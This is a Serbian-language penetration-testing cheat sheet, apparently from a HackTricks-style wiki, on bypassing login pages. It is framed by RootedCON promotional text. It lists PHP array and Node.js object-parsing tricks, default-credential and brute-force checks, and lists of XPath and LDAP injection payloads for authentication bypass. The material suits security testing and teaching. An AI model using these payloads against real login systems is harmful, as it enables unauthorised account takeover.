RootedCON je najrelevantniji kibernetički događaj u Španiji i jedan od najvažnijih u Evropi. Sa misijom promovisanja tehničkog znanja, ovaj kongres je ključno mesto susreta tehnoloških i kibernetičkih profesionalaca u svakoj disciplini.

Bypassovanje redovne prijave

Ako pronađete stranicu za prijavu, ovde možete pronaći neke tehnike za pokušaj zaobilaženja:

• Proverite da li postoje komentari unutar stranice (pomerite se nadole i udesno?)

• Proverite da li možete direktno pristupiti ograničenim stranicama

• Proverite da ne šaljete parametre (ne šaljite nijedan ili samo jedan)

• Proverite PHP grešku poređenja: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

• Promenite tip sadržaja u json i pošaljite json vrednosti (uključujući bool true)

• Ako dobijete odgovor koji kaže da POST nije podržan, možete pokušati da pošaljete JSON u telu ali sa GET zahtevom sa Content-Type: application/json

• Proverite potencijalnu grešku parsiranja u nodejs-u (pročitajte ovo): password[password]=1

• Nodejs će transformisati tu payload u upit sličan sledećem: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; što čini da bit lozinke uvek bude tačan.

• Ako možete poslati JSON objekat, možete poslati "password":{"password": 1} da zaobiđete prijavu.

• Zapamtite da za zaobilaženje ove prijave i dalje morate znati i poslati validno korisničko ime.

• Dodavanje opcije "stringifyObjects":true prilikom pozivanja mysql.createConnection će na kraju blokirati sve neočekivano ponašanje kada se Object prosledi kao parametar.

• Proverite akreditive:

• Podrazumevane akreditive korišćene tehnologije/platforme

• Uobičajene kombinacije (root, admin, password, ime tehnologije, podrazumevani korisnik sa jednom od ovih lozinki).

• Kreirajte rečnik koristeći Cewl, dodajte podrazumevano korisničko ime i lozinku (ako postoji) i pokušajte da je probijete koristeći sve reči kao korisnička imena i lozinke

• Brute-force koristeći veći rečnik (Brute force)

Zaobilaženje autentifikacije SQL Injection-om

Ovde možete pronaći nekoliko trikova za zaobilaženje prijave putem SQL Injection-a.

Na sledećoj stranici možete pronaći prilagođenu listu za pokušaj zaobilaženja prijave putem SQL Injection-a:

Zaobilaženje autentifikacije bez SQL Injection-a

Ovde možete pronaći nekoliko trikova za zaobilaženje prijave putem No SQL Injection-a.

Pošto NoSQL Injection zahteva promenu vrednosti parametara, moraćete ih testirati ručno.

Zaobilaženje autentifikacije XPath Injection-om

Ovde možete pronaći nekoliko trikova za zaobilaženje prijave putem XPath Injection-a

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

Bypass autentifikacije putem LDAP Injectiona

Ovde možete pronaći nekoliko trikova za zaobilaženje prijave putem LDAP Injectiona.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Zapamti me

Ako stranica ima funkcionalnost "Zapamti me", proverite kako je implementirana i vidite da li je možete zloupotrebiti da preuzmete kontrolu nad drugim nalozima.

Preusmeravanja

Stranice obično preusmeravaju korisnike nakon prijave, proverite da li možete promeniti to preusmeravanje da izazovete Otvoreno preusmeravanje. Možda možete ukrasti neke informacije (kodove, kolačiće...) ako preusmerite korisnika na svoj veb sajt.

Ostale provere

• Proverite da li možete nabrajati korisnička imena zloupotrebom funkcionalnosti prijave.

• Proverite da li je automatsko popunjavanje aktivno u poljima za unos lozinke/osetljive informacije: <input autocomplete="false"

​​RootedCON je najrelevantniji kibernetički događaj u Španiji i jedan od najvažnijih u Evropi. Sa misijom promovisanja tehničkog znanja, ovaj kongres je ključno mesto susreta tehnoloških i kibernetičkih stručnjaka u svakoj disciplini.